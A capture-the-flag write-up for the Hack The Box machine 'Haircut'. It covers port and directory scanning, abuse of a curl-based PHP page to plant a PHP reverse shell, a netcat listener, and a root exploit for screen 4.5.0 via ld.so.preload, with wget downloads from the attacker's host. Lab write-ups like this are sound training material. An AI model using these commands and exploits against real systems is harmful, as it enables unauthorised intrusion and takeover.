Haircut HTB
IP
10.10.10.24intial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.24 | cut -d"/" -f1 | tr '\n' ','we have the following ports open
22,80
Lets run aa more in-depth scan
sudo nmap -sCV -p22,80 -oA nmap_results 10.10.10.24results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 secondswe can see
SSH operating
HTTP nginx 1.10.0
Let's checkout the web server
Lets run feroxbuster
feroxbuster -u http://10.10.10.24 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txtwe do find a couple of interesting directories
301 GET 7l 13w 194c http://10.10.10.24/uploads => http://10.10.10.24/uploads/
200 GET 286l 1220w 226984c http://10.10.10.24/bounce.jpg
200 GET 7l 15w 144c http://10.10.10.24/
200 GET 19l 41w 446c http://10.10.10.24/exposed.php/exposed.php
when we hit the go button it looks like
Lets catch a request with burp and see if we can find anything interesting
the web app could very well be utilising a curl command, meaning we can alter the request and download a php shell onto the target hopefully
Lets use pentest monkey php reverse-shell and change the ip to our own in the script
lets start a nc listner
nc -lvnp 1234Lets start a python http server
python3 -m http.server 80in repeater lets see if we can get the curl command to download our
shell.phpSince we now there is a/uploadsdirectory this seems like the perfect place to place our shell
Now if we navigate to
/uploads/shell.phpthis will establish the call back to our listener and we have a shell on the system
Lets upgrade our shell
python3 -c "import pty;pty.spawn('/bin/bash')"we can see within the /var/www/html the exposed.php code
and we indeed can see php it utilising the curl command among among utilising a black list of characters
Lets check the kernel version
uname -rresults
4.4.0-78-genericnothing interesting
Lets see if we can find some SUID bits set
find / -type f -perm /4000 2>/dev/null
this seems like an interesting file to have SUID, after some googling we found an exploit which should create an /etc/ld.so.preload file pointing to a library thatt creates a setuid shell then calls screen again to trigger it
https://github.com/XiphosResearch/exploits/blob/master/screen2root/README.mdwe can upload the exploit to our target machine
Now once i ran the exploit on the target we where given strange error, what ill do is break the exploit to 3 parts
Lets compile them, we are just following the original script
gcc -fPIC -shared -ldl -o exploit.so exploit.c
gcc -o rootshell root.cNow lets transfer tjhese files across
python3 -m http.server 80from the target machine, within the /tmp directory
wget http://10.10.14.2:80/libhax.so
wget http://10.10.14.2:80/rootshell
wget http://10.10.14.2:80/root.shonce we have all the files compiled and on target we can execute them
well change directories into
/etc, set theumask, and run screen
cd /etc
umask 000
screen -4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"Now by this point, the
ld.so.preloadshould have a reference to/tmp/libhax.so
cat ld.so.preload
Now we can access root by running the screen -ls command
Now ld.so.preload has been cleaned up
if we check the permissions for
rootshellits now owned by root and SUID bit is set
now we just need to execute the binary and we have root
rootshell
/tmp/rootshell
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)Last updated